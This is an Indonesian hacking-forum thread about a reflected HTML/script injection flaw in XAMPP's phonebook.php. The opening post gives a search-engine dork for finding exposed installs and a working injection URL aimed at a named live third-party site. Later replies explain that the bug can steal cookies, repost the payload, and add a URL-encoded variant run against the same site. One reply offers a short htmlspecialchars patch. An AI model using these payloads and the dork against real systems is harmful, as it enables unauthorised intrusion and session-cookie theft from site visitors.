XAMPP phonebook.php Multiple Remote HTML Injection Vuln
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
XAMPP phonebook.php Multiple Remote HTML Injection Vuln
XAMPP phonebook.php Multiple Remote HTML Injection Vuln
Source: www.securityfocus.com
Vulnerable File : phonebook.php
Dork : inurl:"xampp/phonebook.php"
Live Action : http://gw.neocolumbus.com/xampp/phonebo ... ript>alert('sh4dhckr was here');</script>&firstname=1
Source: www.securityfocus.com
Vulnerable File : phonebook.php
Dork : inurl:"xampp/phonebook.php"
Live Action : http://gw.neocolumbus.com/xampp/phonebo ... ript>alert('sh4dhckr was here');</script>&firstname=1
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
bisa di kasi penjelasan dikit zam??..
kan gk smua user tw maksud ente di atas...
tul gk??.. hehee..
:circle: :circle: :putusasa:
kan gk smua user tw maksud ente di atas...
tul gk??.. hehee..
:circle: :circle: :putusasa:
regards,
ordinary user,-
ordinary user,-
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
iya om... kagak ngerti mohon penjelasannya. :maaf: :maaf:
imajinasi jauh lebih penting dari pada pengetahuan
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
kalo bugs ini bisa dipake buat nyuri cookies.
kenapa bisa??
soalnya hasil dari inputan bakal di tampilin di webpage. tapi tanpa filter. jadi kalo kita masukin beberapa code langsung di eksekusi..
begitu penjelasan singkat dari saia wil.. tambahin dunk.. wkwkwkwk..
kenapa bisa??
soalnya hasil dari inputan bakal di tampilin di webpage. tapi tanpa filter. jadi kalo kita masukin beberapa code langsung di eksekusi..
begitu penjelasan singkat dari saia wil.. tambahin dunk.. wkwkwkwk..
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
ngerti om tapi cara nmbah codenya gimana om...
http://dotmytees.com/xampp/phonebook.php?showcode=1
mohon bimbingannya... :maaf: :maaf: :maaf:
http://dotmytees.com/xampp/phonebook.php?showcode=1
mohon bimbingannya... :maaf: :maaf: :maaf:
imajinasi jauh lebih penting dari pada pengetahuan
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
ia om tapi cara nginjek codenya gimana om...
imajinasi jauh lebih penting dari pada pengetahuan
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
@nesta
penjelasan :
ini URL asli..
hasil inject code HTML buat alert..
kalo masih belum ngeh juga?? coba search di forum tentang XSS..
numpang share patchnya... tapi bener gak ya??? review dunk...
Code: Select all
http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1
ini URL asli..
Code: Select all
http://gw.neocolumbus.com/xampp/phonebook.php
Code: Select all
http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1
numpang share patchnya... tapi bener gak ya??? review dunk...
Code: Select all
<?php
$xss = htmlspecialchars($_POST['msg']);
if($xss == "")
{
echo "gak boleh kosong!";
} else {
echo "pesan kamu : <b>".$xss."</b>";
}
?>
Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln
wew ngerti dah om... makasih y????
:devil :devil :devil
Code: Select all
http://gw.neocolumbus.com/xampp/phonebook.php?lastname=%3Cscript%3Ealert%28%27nesta%20was%20here%27%29;%3C/script%3E&firstname=1
imajinasi jauh lebih penting dari pada pengetahuan